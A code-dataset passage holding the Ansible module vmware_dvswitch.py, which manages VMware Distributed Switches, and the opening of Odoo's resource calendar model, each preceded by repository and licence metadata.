%(msg, pastebinurl))
mpl-2.0
kvar/ansible
lib/ansible/modules/cloud/vmware/vmware_dvswitch.py
23
33516
#!/usr/bin/python # -*- coding: utf-8 -*- # # Copyright: (c) 2015, Joseph Callen <jcallen () csc.com> # Copyright: (c) 2018, Abhijeet Kasurde <akasurde@redhat.com> # Copyright: (c) 2018, Christian Kotte <christian.kotte@gmx.de> # Copyright: (c) 2018, Ansible Project # # GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt) from __future__ import absolute_import, division, print_function __metaclass__ = type ANSIBLE_METADATA = { 'metadata_version': '1.1', 'status': ['preview'], 'supported_by': 'community' } DOCUMENTATION = ''' --- module: vmware_dvswitch short_description: Create or remove a Distributed Switch description: - This module can be used to create, remove a Distributed Switch. version_added: 2.0 author: - Joseph Callen (@jcpowermac) - Abhijeet Kasurde (@Akasurde) - Christian Kotte (@ckotte) notes: - Tested on vSphere 6.5 and 6.7 requirements: - "python >= 2.6" - PyVmomi options: datacenter_name: description: - The name of the datacenter that will contain the Distributed Switch. - This parameter is optional, if C(folder) is provided. - Mutually exclusive with C(folder) parameter. required: False aliases: ['datacenter'] type: str switch_name: description: - The name of the distribute vSwitch to create or remove. required: True aliases: ['switch', 'dvswitch'] type: str switch_version: description: - The version of the Distributed Switch to create. - Can be 6.0.0, 5.5.0, 5.1.0, 5.0.0 with a vCenter running vSphere 6.0 and 6.5. - Can be 6.6.0, 6.5.0, 6.0.0 with a vCenter running vSphere 6.7. - The version must match the version of the ESXi hosts you want to connect. - The version of the vCenter server is used if not specified. - Required only if C(state) is set to C(present). version_added: 2.5 choices: ['5.0.0', '5.1.0', '5.5.0', '6.0.0', '6.5.0', '6.6.0'] aliases: ['version'] type: str mtu: description: - The switch maximum transmission unit. - Required parameter for C(state) both C(present) and C(absent), before Ansible 2.6 version. - Required only if C(state) is set to C(present), for Ansible 2.6 and onwards. - Accepts value between 1280 to 9000 (both inclusive). type: int default: 1500 multicast_filtering_mode: description: - The multicast filtering mode. - 'C(basic) mode: multicast traffic for virtual machines is forwarded according to the destination MAC address of the multicast group.' - 'C(snooping) mode: the Distributed Switch provides IGMP and MLD snooping according to RFC 4541.' type: str choices: ['basic', 'snooping'] default: 'basic' version_added: 2.8 uplink_quantity: description: - Quantity of uplink per ESXi host added to the Distributed Switch. - The uplink quantity can be increased or decreased, but a decrease will only be successfull if the uplink isn't used by a portgroup. - Required parameter for C(state) both C(present) and C(absent), before Ansible 2.6 version. - Required only if C(state) is set to C(present), for Ansible 2.6 and onwards. type: int uplink_prefix: description: - The prefix used for the naming of the uplinks. - Only valid if the Distributed Switch will be created. Not used if the Distributed Switch is already present. - Uplinks are created as Uplink 1, Uplink 2, etc. pp. by default. default: 'Uplink ' version_added: 2.8 type: str discovery_proto: description: - Link discovery protocol between Cisco and Link Layer discovery. - Required parameter for C(state) both C(present) and C(absent), before Ansible 2.6 version. - Required only if C(state) is set to C(present), for Ansible 2.6 and onwards. - 'C(cdp): Use Cisco Discovery Protocol (CDP).' - 'C(lldp): Use Link Layer Discovery Protocol (LLDP).' - 'C(disabled): Do not use a discovery protocol.' choices: ['cdp', 'lldp', 'disabled'] default: 'cdp' aliases: [ 'discovery_protocol' ] type: str discovery_operation: description: - Select the discovery operation. - Required parameter for C(state) both C(present) and C(absent), before Ansible 2.6 version. - Required only if C(state) is set to C(present), for Ansible 2.6 and onwards. choices: ['both', 'advertise', 'listen'] default: 'listen' type: str contact: description: - Dictionary which configures administrator contact name and description for the Distributed Switch. - 'Valid attributes are:' - '- C(name) (str): Administrator name.' - '- C(description) (str): Description or other details.' type: dict version_added: 2.8 description: description: - Description of the Distributed Switch. type: str version_added: 2.8 health_check: description: - Dictionary which configures Health Check for the Distributed Switch. - 'Valid attributes are:' - '- C(vlan_mtu) (bool): VLAN and MTU health check. (default: False)' - '- C(teaming_failover) (bool): Teaming and failover health check. (default: False)' - '- C(vlan_mtu_interval) (int): VLAN and MTU health check interval (minutes). (default: 0)' - '- The default for C(vlan_mtu_interval) is 1 in the vSphere Client if the VLAN and MTU health check is enabled.' - '- C(teaming_failover_interval) (int): Teaming and failover health check interval (minutes). (default: 0)' - '- The default for C(teaming_failover_interval) is 1 in the vSphere Client if the Teaming and failover health check is enabled.' type: dict default: { vlan_mtu: False, teaming_failover: False, vlan_mtu_interval: 0, teaming_failover_interval: 0, } version_added: 2.8 state: description: - If set to C(present) and the Distributed Switch doesn't exists then the Distributed Switch will be created. - If set to C(absent) and the Distributed Switch exists then the Distributed Switch will be deleted. default: 'present' choices: ['present', 'absent'] type: str folder: description: - Destination folder, absolute path to place dvswitch in. - The folder should include the datacenter. - This parameter is case sensitive. - This parameter is optional, if C(datacenter) is provided. - 'Examples:' - ' folder: /datacenter1/network' - ' folder: datacenter1/network' - ' folder: /datacenter1/network/folder1' - ' folder: datacenter1/network/folder1' - ' folder: /folder1/datacenter1/network' - ' folder: folder1/datacenter1/network' - ' folder: /folder1/datacenter1/network/folder2' required: False type: str version_added: 2.9 extends_documentation_fragment: vmware.documentation ''' EXAMPLES = ''' - name: Create dvSwitch vmware_dvswitch: hostname: '{{ vcenter_hostname }}' username: '{{ vcenter_username }}' password: '{{ vcenter_password }}' datacenter: '{{ datacenter }}' switch: dvSwitch version: 6.0.0 mtu: 9000 uplink_quantity: 2 discovery_protocol: lldp discovery_operation: both state: present delegate_to: localhost - name: Create dvSwitch with all options vmware_dvswitch: hostname: '{{ vcenter_hostname }}' username: '{{ vcenter_username }}' password: '{{ vcenter_password }}' datacenter: '{{ datacenter }}' switch: dvSwitch version: 6.5.0 mtu: 9000 uplink_quantity: 2 uplink_prefix: 'Uplink_' discovery_protocol: cdp discovery_operation: both multicast_filtering_mode: snooping health_check: vlan_mtu: true vlan_mtu_interval: 1 teaming_failover: true teaming_failover_interval: 1 state: present delegate_to: localhost - name: Delete dvSwitch vmware_dvswitch: hostname: '{{ vcenter_hostname }}' username: '{{ vcenter_username }}' password: '{{ vcenter_password }}' datacenter: '{{ datacenter }}' switch: dvSwitch state: absent delegate_to: localhost ''' RETURN = """ result: description: information about performed operation returned: always type: str sample: { "changed": false, "contact": null, "contact_details": null, "description": null, "discovery_operation": "both", "discovery_protocol": "cdp", "dvswitch": "test", "health_check_teaming": false, "health_check_teaming_interval": 0, "health_check_vlan": false, "health_check_vlan_interval": 0, "mtu": 9000, "multicast_filtering_mode": "basic", "result": "DVS already configured properly", "uplink_quantity": 2, "uplinks": [ "Uplink_1", "Uplink_2" ], "version": "6.6.0" } """ try: from pyVmomi import vim, vmodl except ImportError: pass from ansible.module_utils.basic import AnsibleModule from ansible.module_utils._text import to_native from ansible.module_utils.vmware import ( PyVmomi, TaskError, find_dvs_by_name, vmware_argument_spec, wait_for_task ) class VMwareDvSwitch(PyVmomi): """Class to manage a Distributed Virtual Switch""" def __init__(self, module): super(VMwareDvSwitch, self).__init__(module) self.dvs = None self.switch_name = self.module.params['switch_name'] self.switch_version = self.module.params['switch_version'] if self.content.about.version == '6.7.0': self.vcenter_switch_version = '6.6.0' else: self.vcenter_switch_version = self.content.about.version folder = self.params['folder'] if folder: self.folder_obj = self.content.searchIndex.FindByInventoryPath(folder) if not self.folder_obj: self.module.fail_json(msg="Failed to find the folder specified by %(folder)s" % self.params) else: datacenter_name = self.params.get('datacenter_name') datacenter_obj = self.find_datacenter_by_name(datacenter_name) if not datacenter_obj: self.module.fail_json(msg="Failed to find datacenter '%s' required" " for managing distributed vSwitch." % datacenter_name) self.folder_obj = datacenter_obj.networkFolder self.mtu = self.module.params['mtu'] # MTU sanity check if not 1280 <= self.mtu <= 9000: self.module.fail_json( msg="MTU value should be between 1280 and 9000 (both inclusive), provided %d." % self.mtu ) self.multicast_filtering_mode = self.module.params['multicast_filtering_mode'] self.uplink_quantity = self.module.params['uplink_quantity'] self.uplink_prefix = self.module.params['uplink_prefix'] self.discovery_protocol = self.module.params['discovery_proto'] self.discovery_operation = self.module.params['discovery_operation'] # TODO: add port mirroring self.health_check_vlan = self.params['health_check'].get('vlan_mtu') self.health_check_vlan_interval = self.params['health_check'].get('vlan_mtu_interval') self.health_check_teaming = self.params['health_check'].get('teaming_failover') self.health_check_teaming_interval = self.params['health_check'].get('teaming_failover_interval') if self.params['contact']: self.contact_name = self.params['contact'].get('name') self.contact_details = self.params['contact'].get('details') else: self.contact_name = None self.contact_details = None self.description = self.module.params['description'] self.state = self.module.params['state'] def process_state(self): """Process the current state of the DVS""" dvs_states = { 'absent': { 'present': self.destroy_dvswitch, 'absent': self.exit_unchanged, }, 'present': { 'present': self.update_dvswitch, 'absent': self.create_dvswitch, } } try: dvs_states[self.state][self.check_dvs()]() except vmodl.RuntimeFault as runtime_fault: self.module.fail_json(msg=to_native(runtime_fault.msg)) except vmodl.MethodFault as method_fault: self.module.fail_json(msg=to_native(method_fault.msg)) except Exception as e: self.module.fail_json(msg=to_native(e)) def check_dvs(self): """Check if DVS is present""" self.dvs = find_dvs_by_name(self.content, self.switch_name, folder=self.folder_obj) if self.dvs is None: return 'absent' return 'present' def create_dvswitch(self): """Create a DVS""" changed = True results = dict(changed=changed) spec = vim.DistributedVirtualSwitch.CreateSpec() spec.configSpec = vim.dvs.VmwareDistributedVirtualSwitch.ConfigSpec() # Name results['dvswitch'] = self.switch_name spec.configSpec.name = self.switch_name # MTU results['mtu'] = self.mtu spec.configSpec.maxMtu = self.mtu # Discovery Protocol type and operation results['discovery_protocol'] = self.discovery_protocol results['discovery_operation'] = self.discovery_operation spec.configSpec.linkDiscoveryProtocolConfig = self.create_ldp_spec() # Administrator contact results['contact'] = self.contact_name results['contact_details'] = self.contact_details if self.contact_name or self.contact_details: spec.contact = self.create_contact_spec() # Description results['description'] = self.description if self.description: spec.description = self.description # Uplinks results['uplink_quantity'] = self.uplink_quantity spec.configSpec.uplinkPortPolicy = vim.DistributedVirtualSwitch.NameArrayUplinkPortPolicy() for count in range(1, self.uplink_quantity + 1): spec.configSpec.uplinkPortPolicy.uplinkPortName.append("%s%d" % (self.uplink_prefix, count)) results['uplinks'] = spec.configSpec.uplinkPortPolicy.uplinkPortName # Version results['version'] = self.switch_version if self.switch_version: spec.productInfo = self.create_product_spec(self.switch_version) if self.module.check_mode: result = "DVS would be created" else: # Create DVS network_folder = self.folder_obj task = network_folder.CreateDVS_Task(spec) try: wait_for_task(task) except TaskError as invalid_argument: self.module.fail_json( msg="Failed to create DVS : %s" % to_native(invalid_argument) ) # Find new DVS self.dvs = find_dvs_by_name(self.content, self.switch_name) changed_multicast = False spec = vim.dvs.VmwareDistributedVirtualSwitch.ConfigSpec() # Use the same version in the new spec; The version will be increased by one by the API automatically spec.configVersion = self.dvs.config.configVersion # Set multicast filtering mode results['multicast_filtering_mode'] = self.multicast_filtering_mode multicast_filtering_mode = self.get_api_mc_filtering_mode(self.multicast_filtering_mode) if self.dvs.config.multicastFilteringMode != multicast_filtering_mode: changed_multicast = True spec.multicastFilteringMode = multicast_filtering_mode spec.multicastFilteringMode = self.get_api_mc_filtering_mode(self.multicast_filtering_mode) if changed_multicast: self.update_dvs_config(self.dvs, spec) # Set Health Check config results['health_check_vlan'] = self.health_check_vlan results['health_check_teaming'] = self.health_check_teaming result = self.check_health_check_config(self.dvs.config.healthCheckConfig) changed_health_check = result[1] if changed_health_check: self.update_health_check_config(self.dvs, result[0]) result = "DVS created" self.module.exit_json(changed=changed, result=to_native(result)) def create_ldp_spec(self): """Create Link Discovery Protocol config spec""" ldp_config_spec = vim.host.LinkDiscoveryProtocolConfig() if self.discovery_protocol == 'disabled': ldp_config_spec.protocol = 'cdp' ldp_config_spec.operation = 'none' else: ldp_config_spec.protocol = self.discovery_protocol ldp_config_spec.operation = self.discovery_operation return ldp_config_spec def create_product_spec(self, switch_version): """Create product info spec""" product_info_spec = vim.dvs.ProductSpec() product_info_spec.version = switch_version return product_info_spec @staticmethod def get_api_mc_filtering_mode(mode): """Get Multicast filtering mode""" if mode == 'basic': return 'legacyFiltering' return 'snooping' def create_contact_spec(self): """Create contact info spec""" contact_info_spec = vim.DistributedVirtualSwitch.ContactInfo() contact_info_spec.name = self.contact_name contact_info_spec.contact = self.contact_details return contact_info_spec def update_dvs_config(self, switch_object, spec): """Update DVS config""" try: task = switch_object.ReconfigureDvs_Task(spec) wait_for_task(task) except TaskError as invalid_argument: self.module.fail_json( msg="Failed to update DVS : %s" % to_native(invalid_argument) ) def check_health_check_config(self, health_check_config): """Check Health Check config""" changed = changed_vlan = changed_vlan_interval = changed_teaming = changed_teaming_interval = False vlan_previous = teaming_previous = None vlan_interval_previous = teaming_interval_previous = 0 for config in health_check_config: if isinstance(config, vim.dvs.VmwareDistributedVirtualSwitch.VlanMtuHealthCheckConfig): if config.enable != self.health_check_vlan: changed = changed_vlan = True vlan_previous = config.enable config.enable = self.health_check_vlan if config.enable and config.interval != self.health_check_vlan_interval: changed = changed_vlan_interval = True vlan_interval_previous = config.interval config.interval = self.health_check_vlan_interval if isinstance(config, vim.dvs.VmwareDistributedVirtualSwitch.TeamingHealthCheckConfig): if config.enable != self.health_check_teaming: changed = changed_teaming = True teaming_previous = config.enable config.enable = self.health_check_teaming if config.enable and config.interval != self.health_check_teaming_interval: changed = changed_teaming_interval = True teaming_interval_previous = config.interval config.interval = self.health_check_teaming_interval return (health_check_config, changed, changed_vlan, vlan_previous, changed_vlan_interval, vlan_interval_previous, changed_teaming, teaming_previous, changed_teaming_interval, teaming_interval_previous) def update_health_check_config(self, switch_object, health_check_config): """Update Health Check config""" try: task = switch_object.UpdateDVSHealthCheckConfig_Task(healthCheckConfig=health_check_config) except vim.fault.DvsFault as dvs_fault: self.module.fail_json(msg="Update failed due to DVS fault : %s" % to_native(dvs_fault)) except vmodl.fault.NotSupported as not_supported: self.module.fail_json(msg="Health check not supported on the switch : %s" % to_native(not_supported)) except TaskError as invalid_argument: self.module.fail_json(msg="Failed to configure health check : %s" % to_native(invalid_argument)) try: wait_for_task(task) except TaskError as invalid_argument: self.module.fail_json(msg="Failed to update health check config : %s" % to_native(invalid_argument)) def exit_unchanged(self): """Exit with status message""" changed = False results = dict(changed=changed) results['dvswitch'] = self.switch_name results['result'] = "DVS not present" self.module.exit_json(**results) def destroy_dvswitch(self): """Delete a DVS""" changed = True results = dict(changed=changed) results['dvswitch'] = self.switch_name if self.module.check_mode: results['result'] = "DVS would be deleted" else: try: task = self.dvs.Destroy_Task() except vim.fault.VimFault as vim_fault: self.module.fail_json(msg="Failed to deleted DVS : %s" % to_native(vim_fault)) wait_for_task(task) results['result'] = "DVS deleted" self.module.exit_json(**results) def update_dvswitch(self): """Check and update DVS settings""" changed = changed_settings = changed_ldp = changed_version = changed_health_check = False results = dict(changed=changed) results['dvswitch'] = self.switch_name changed_list = [] config_spec = vim.dvs.VmwareDistributedVirtualSwitch.ConfigSpec() # Use the same version in the new spec; The version will be increased by one by the API automatically config_spec.configVersion = self.dvs.config.configVersion # Check MTU results['mtu'] = self.mtu if self.dvs.config.maxMtu != self.mtu: changed = changed_settings = True changed_list.append("mtu") results['mtu_previous'] = config_spec.maxMtu config_spec.maxMtu = self.mtu # Check Discovery Protocol type and operation ldp_protocol = self.dvs.config.linkDiscoveryProtocolConfig.protocol ldp_operation = self.dvs.config.linkDiscoveryProtocolConfig.operation if self.discovery_protocol == 'disabled': results['discovery_protocol'] = self.discovery_protocol results['discovery_operation'] = 'n/a' if ldp_protocol != 'cdp' or ldp_operation != 'none': changed_ldp = True results['discovery_protocol_previous'] = ldp_protocol results['discovery_operation_previous'] = ldp_operation else: results['discovery_protocol'] = self.discovery_protocol results['discovery_operation'] = self.discovery_operation if ldp_protocol != self.discovery_protocol or ldp_operation != self.discovery_operation: changed_ldp = True if ldp_protocol != self.discovery_protocol: results['discovery_protocol_previous'] = ldp_protocol if ldp_operation != self.discovery_operation: results['discovery_operation_previous'] = ldp_operation if changed_ldp: changed = changed_settings = True changed_list.append("discovery protocol") config_spec.linkDiscoveryProtocolConfig = self.create_ldp_spec() # Check Multicast filtering mode results['multicast_filtering_mode'] = self.multicast_filtering_mode multicast_filtering_mode = self.get_api_mc_filtering_mode(self.multicast_filtering_mode) if self.dvs.config.multicastFilteringMode != multicast_filtering_mode: changed = changed_settings = True changed_list.append("multicast filtering") results['multicast_filtering_mode_previous'] = self.dvs.config.multicastFilteringMode config_spec.multicastFilteringMode = multicast_filtering_mode # Check administrator contact results['contact'] = self.contact_name results['contact_details'] = self.contact_details if self.dvs.config.contact.name != self.contact_name or self.dvs.config.contact.contact != self.contact_details: changed = changed_settings = True changed_list.append("contact") results['contact_previous'] = self.dvs.config.contact.name results['contact_details_previous'] = self.dvs.config.contact.contact config_spec.contact = self.create_contact_spec() # Check description results['description'] = self.description if self.dvs.config.description != self.description: changed = changed_settings = True changed_list.append("description") results['description_previous'] = self.dvs.config.description if self.description is None: # need to use empty string; will be set to None by API config_spec.description = '' else: config_spec.description = self.description # Check uplinks results['uplink_quantity'] = self.uplink_quantity if len(self.dvs.config.uplinkPortPolicy.uplinkPortName) != self.uplink_quantity: changed = changed_settings = True changed_list.append("uplink quantity") results['uplink_quantity_previous'] = len(self.dvs.config.uplinkPortPolicy.uplinkPortName) config_spec.uplinkPortPolicy = vim.DistributedVirtualSwitch.NameArrayUplinkPortPolicy() # just replace the uplink array if uplinks need to be added if len(self.dvs.config.uplinkPortPolicy.uplinkPortName) < self.uplink_quantity: for count in range(1, self.uplink_quantity + 1): config_spec.uplinkPortPolicy.uplinkPortName.append("%s%d" % (self.uplink_prefix, count)) # just replace the uplink array if uplinks need to be removed if len(self.dvs.config.uplinkPortPolicy.uplinkPortName) > self.uplink_quantity: for count in range(1, self.uplink_quantity + 1): config_spec.uplinkPortPolicy.uplinkPortName.append("%s%d" % (self.uplink_prefix, count)) results['uplinks'] = config_spec.uplinkPortPolicy.uplinkPortName results['uplinks_previous'] = self.dvs.config.uplinkPortPolicy.uplinkPortName else: # No uplink name check; uplink names can't be changed easily if they are used by a portgroup results['uplinks'] = self.dvs.config.uplinkPortPolicy.uplinkPortName # Check Health Check results['health_check_vlan'] = self.health_check_vlan results['health_check_teaming'] = self.health_check_teaming results['health_check_vlan_interval'] = self.health_check_vlan_interval results['health_check_teaming_interval'] = self.health_check_teaming_interval (health_check_config, changed_health_check, changed_vlan, vlan_previous, changed_vlan_interval, vlan_interval_previous, changed_teaming, teaming_previous, changed_teaming_interval, teaming_interval_previous) = \ self.check_health_check_config(self.dvs.config.healthCheckConfig) if changed_health_check: changed = True changed_list.append("health check") if changed_vlan: results['health_check_vlan_previous'] = vlan_previous if changed_vlan_interval: results['health_check_vlan_interval_previous'] = vlan_interval_previous if changed_teaming: results['health_check_teaming_previous'] = teaming_previous if changed_teaming_interval: results['health_check_teaming_interval_previous'] = teaming_interval_previous # Check switch version if self.switch_version: results['version'] = self.switch_version if self.dvs.config.productInfo.version != self.switch_version: changed_version = True spec_product = self.create_product_spec(self.switch_version) else: results['version'] = self.vcenter_switch_version if self.dvs.config.productInfo.version != self.vcenter_switch_version: changed_version = True spec_product = self.create_product_spec(self.vcenter_switch_version) if changed_version: changed = True changed_list.append("switch version") results['version_previous'] = self.dvs.config.productInfo.version if changed: if self.module.check_mode: changed_suffix = ' would be changed' else: changed_suffix = ' changed' if len(changed_list) > 2: message = ', '.join(changed_list[:-1]) + ', and ' + str(changed_list[-1]) elif len(changed_list) == 2: message = ' and '.join(changed_list) elif len(changed_list) == 1: message = changed_list[0] message += changed_suffix if not self.module.check_mode: if changed_settings: self.update_dvs_config(self.dvs, config_spec) if changed_health_check: self.update_health_check_config(self.dvs, health_check_config) if changed_version: task = self.dvs.PerformDvsProductSpecOperation_Task("upgrade", spec_product) try: wait_for_task(task) except TaskError as invalid_argument: self.module.fail_json(msg="Failed to update DVS version : %s" % to_native(invalid_argument)) else: message = "DVS already configured properly" results['changed'] = changed results['result'] = message self.module.exit_json(**results) def main(): """Main""" argument_spec = vmware_argument_spec() argument_spec.update( dict( datacenter_name=dict(aliases=['datacenter']), folder=dict(), switch_name=dict(required=True, aliases=['switch', 'dvswitch']), mtu=dict(type='int', default=1500), multicast_filtering_mode=dict(type='str', default='basic', choices=['basic', 'snooping']), switch_version=dict( choices=['5.0.0', '5.1.0', '5.5.0', '6.0.0', '6.5.0', '6.6.0'], aliases=['version'], default=None ), uplink_quantity=dict(type='int'), uplink_prefix=dict(type='str', default='Uplink '), discovery_proto=dict( type='str', choices=['cdp', 'lldp', 'disabled'], default='cdp', aliases=['discovery_protocol'] ), discovery_operation=dict(type='str', choices=['both', 'advertise', 'listen'], default='listen'), health_check=dict( type='dict', options=dict( vlan_mtu=dict(type='bool', default=False), teaming_failover=dict(type='bool', default=False), vlan_mtu_interval=dict(type='int', default=0), teaming_failover_interval=dict(type='int', default=0), ), default=dict( vlan_mtu=False, teaming_failover=False, vlan_mtu_interval=0, teaming_failover_interval=0, ), ), contact=dict( type='dict', options=dict( name=dict(type='str'), description=dict(type='str'), ), ), description=dict(type='str'), state=dict(default='present', choices=['present', 'absent']), ) ) module = AnsibleModule( argument_spec=argument_spec, required_if=[ ('state', 'present', ['uplink_quantity']), ], required_one_of=[ ['folder', 'datacenter_name'], ], mutually_exclusive=[ ['folder', 'datacenter_name'], ], supports_check_mode=True, ) vmware_dvswitch = VMwareDvSwitch(module) vmware_dvswitch.process_state() if __name__ == '__main__': main()
gpl-3.0
miguelparaiso/OdooAccessible
addons/resource/resource.py
174
42653
# -*- coding: utf-8 -*- ############################################################################## # # OpenERP, Open Source Management Solution # Copyright (C) 2004-TODAY OpenERP SA (http://www.openerp.com) # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU Affero General Public License as # published by the Free Software Foundation, either version 3 of the # License, or (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU Affero General Public License for more details. # # You should have received a copy of the GNU Affero General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. # ############################################################################## import datetime from dateutil import rrule from dateutil.relativedelta import relativedelta from operator import itemgetter from openerp import tools from openerp.osv import fields, osv from openerp.tools.float_utils import float_compare from openerp.tools.translate import _ class resource_calendar(osv.osv): """ Calendar model for a resource. It has - attendance_ids: list of resource.calendar.attendance that are a working interval in a given weekday. - leave_ids: list of leaves linked to this calendar. A leave can be general or linked to a specific resource, depending on its resource_id. All methods in this class use intervals. An interval is a tuple holding (begin_datetime, end_datetime). A list of intervals is therefore a list of tuples, holding several intervals of work or leaves. """ _name = "resource.calendar" _description = "Resource Calendar" _columns = { 'name': fields.char("Name", required=True), 'company_id': fields.many2one('res.company', 'Company', required=False), 'attendance_ids': fields.one2many('resource.calendar.attendance', 'calendar_id', 'Working Time', copy=True), 'manager': fields.many2one('res.users', 'Workgroup Manager'), 'leave_ids': fields.one2many( 'resource.calendar.leaves', 'calendar_id', 'Leaves', help='' ), } _defaults = { 'company_id': lambda self, cr, uid, context: self.pool.get('res.company')._company_default_get(cr, uid, 'resource.calendar', context=context) } # -------------------------------------------------- # Utility methods # -------------------------------------------------- def interval_clean(self, intervals): """ Utility method that sorts and removes overlapping inside datetime intervals. The intervals are sorted based on increasing starting datetime. Overlapping intervals are merged into a single one. :param list intervals: list of intervals; each interval is a tuple (datetime_from, datetime_to) :return list cleaned: list of sorted intervals without overlap """ intervals = sorted(intervals, key=itemgetter(0)) # sort on first datetime cleaned = [] working_interval = None while intervals: current_interval = intervals.pop(0) if not working_interval: # init working_interval = [current_interval[0], current_interval[1]] elif working_interval[1] < current_interval[0]: # interval is disjoint cleaned.append(tuple(working_interval)) working_interval = [current_interval[0], current_interval[1]] elif working_interval[1] < current_interval[1]: # union of greater intervals working_interval[1] = current_interval[1] if working_interval: # handle void lists cleaned.append(tuple(working_interval)) return cleaned def interval_remove_leaves(self, interval, leave_intervals): """ Utility method that remove leave intervals from a base interval: - clean the leave intervals, to have an ordered list of not-overlapping intervals - initiate the current interval to be the base interval - for each leave interval: - finishing before the current interval: skip, go to next - beginning after the current interval: skip and get out of the loop because we are outside range (leaves are ordered) - beginning within the current interval: close the current interval and begin a new current interval that begins at the end of the leave interval - ending within the current interval: update the current interval begin to match the leave interval ending :param tuple interval: a tuple (beginning datetime, ending datetime) that is the base interval from which the leave intervals will be removed :param list leave_intervals: a list of tuples (beginning datetime, ending datetime) that are intervals to remove from the base interval :return list intervals: a list of tuples (begin datetime, end datetime) that are the remaining valid intervals """ if not interval: return interval if leave_intervals is None: leave_intervals = [] intervals = [] leave_intervals = self.interval_clean(leave_intervals) current_interval = [interval[0], interval[1]] for leave in leave_intervals: if leave[1] <= current_interval[0]: continue if leave[0] >= current_interval[1]: break if current_interval[0] < leave[0] < current_interval[1]: current_interval[1] = leave[0] intervals.append((current_interval[0], current_interval[1])) current_interval = [leave[1], interval[1]] # if current_interval[0] <= leave[1] <= current_interval[1]: if current_interval[0] <= leave[1]: current_interval[0] = leave[1] if current_interval and current_interval[0] < interval[1]: # remove intervals moved outside base interval due to leaves intervals.append((current_interval[0], current_interval[1])) return intervals def interval_schedule_hours(self, intervals, hour, remove_at_end=True): """ Schedule hours in intervals. The last matching interval is truncated to match the specified hours. It is possible to truncate the last interval at its beginning or ending. However this does nothing on the given interval order that should be submitted accordingly. :param list intervals: a list of tuples (beginning datetime, ending datetime) :param int/float hours: number of hours to schedule. It will be converted into a timedelta, but should be submitted as an int or float. :param boolean remove_at_end: remove extra hours at the end of the last matching interval. Otherwise, do it at the beginning. :return list results: a list of intervals. If the number of hours to schedule is greater than the possible scheduling in the intervals, no extra-scheduling is done, and results == intervals. """ results = [] res = datetime.timedelta() limit = datetime.timedelta(hours=hour) for interval in intervals: res += interval[1] - interval[0] if res > limit and remove_at_end: interval = (interval[0], interval[1] + relativedelta(seconds=seconds(limit-res))) elif res > limit: interval = (interval[0] + relativedelta(seconds=seconds(res-limit)), interval[1]) results.append(interval) if res > limit: break return results # -------------------------------------------------- # Date and hours computation # -------------------------------------------------- def get_attendances_for_weekdays(self, cr, uid, id, weekdays, context=None): """ Given a list of weekdays, return matching resource.calendar.attendance""" calendar = self.browse(cr, uid, id, context=None) return [att for att in calendar.attendance_ids if int(att.dayofweek) in weekdays] def get_weekdays(self, cr, uid, id, default_weekdays=None, context=None): """ Return the list of weekdays that contain at least one working interval. If no id is given (no calendar), return default weekdays. """ if id is None: return default_weekdays if default_weekdays is not None else [0, 1, 2, 3, 4] calendar = self.browse(cr, uid, id, context=None) weekdays = set() for attendance in calendar.attendance_ids: weekdays.add(int(attendance.dayofweek)) return list(weekdays) def get_next_day(self, cr, uid, id, day_date, context=None): """ Get following date of day_date, based on resource.calendar. If no calendar is provided, just return the next day. :param int id: id of a resource.calendar. If not given, simply add one day to the submitted date. :param date day_date: current day as a date :return date: next day of calendar, or just next day """ if not id: return day_date + relativedelta(days=1) weekdays = self.get_weekdays(cr, uid, id, context) base_index = -1 for weekday in weekdays: if weekday > day_date.weekday(): break base_index += 1 new_index = (base_index + 1) % len(weekdays) days = (weekdays[new_index] - day_date.weekday()) if days < 0: days = 7 + days return day_date + relativedelta(days=days) def get_previous_day(self, cr, uid, id, day_date, context=None): """ Get previous date of day_date, based on resource.calendar. If no calendar is provided, just return the previous day. :param int id: id of a resource.calendar. If not given, simply remove one day from the submitted date. :param date day_date: current day as a date :return date: previous day of calendar, or just previous day """ if not id: return day_date + relativedelta(days=-1) weekdays = self.get_weekdays(cr, uid, id, context) weekdays.reverse() base_index = -1 for weekday in weekdays: if weekday < day_date.weekday(): break base_index += 1 new_index = (base_index + 1) % len(weekdays) days = (weekdays[new_index] - day_date.weekday()) if days > 0: days = days - 7 return day_date + relativedelta(days=days) def get_leave_intervals(self, cr, uid, id, resource_id=None, start_datetime=None, end_datetime=None, context=None): """Get the leaves of the calendar. Leaves can be filtered on the resource, the start datetime or the end datetime. :param int resource_id: the id of the resource to take into account when computing the leaves. If not set, only general leaves are computed. If set, generic and specific leaves are computed. :param datetime start_datetime: if provided, do not take into account leaves ending before this date. :param datetime end_datetime: if provided, do not take into account leaves beginning after this date. :return list leaves: list of tuples (start_datetime, end_datetime) of leave intervals """ resource_calendar = self.browse(cr, uid, id, context=context) leaves = [] for leave in resource_calendar.leave_ids: if leave.resource_id and not resource_id == leave.resource_id.id: continue date_from = datetime.datetime.strptime(leave.date_from, tools.DEFAULT_SERVER_DATETIME_FORMAT) if end_datetime and date_from > end_datetime: continue date_to = datetime.datetime.strptime(leave.date_to, tools.DEFAULT_SERVER_DATETIME_FORMAT) if start_datetime and date_to < start_datetime: continue leaves.append((date_from, date_to)) return leaves def get_working_intervals_of_day(self, cr, uid, id, start_dt=None, end_dt=None, leaves=None, compute_leaves=False, resource_id=None, default_interval=None, context=None): """ Get the working intervals of the day based on calendar. This method handle leaves that come directly from the leaves parameter or can be computed. :param int id: resource.calendar id; take the first one if is a list :param datetime start_dt: datetime object that is the beginning hours for the working intervals computation; any working interval beginning before start_dt will be truncated. If not set, set to end_dt or today() if no end_dt at 00.00.00. :param datetime end_dt: datetime object that is the ending hour for the working intervals computation; any working interval ending after end_dt will be truncated. If not set, set to start_dt() at 23.59.59. :param list leaves: a list of tuples(start_datetime, end_datetime) that represent leaves. :param boolean compute_leaves: if set and if leaves is None, compute the leaves based on calendar and resource. If leaves is None and compute_leaves false no leaves are taken into account. :param int resource_id: the id of the resource to take into account when computing the leaves. If not set, only general leaves are computed. If set, generic and specific leaves are computed. :param tuple default_interval: if no id, try to return a default working day using default_interval[0] as beginning hour, and default_interval[1] as ending hour. Example: default_interval = (8, 16). Otherwise, a void list of working intervals is returned when id is None. :return list intervals: a list of tuples (start_datetime, end_datetime) of work intervals """ if isinstance(id, (list, 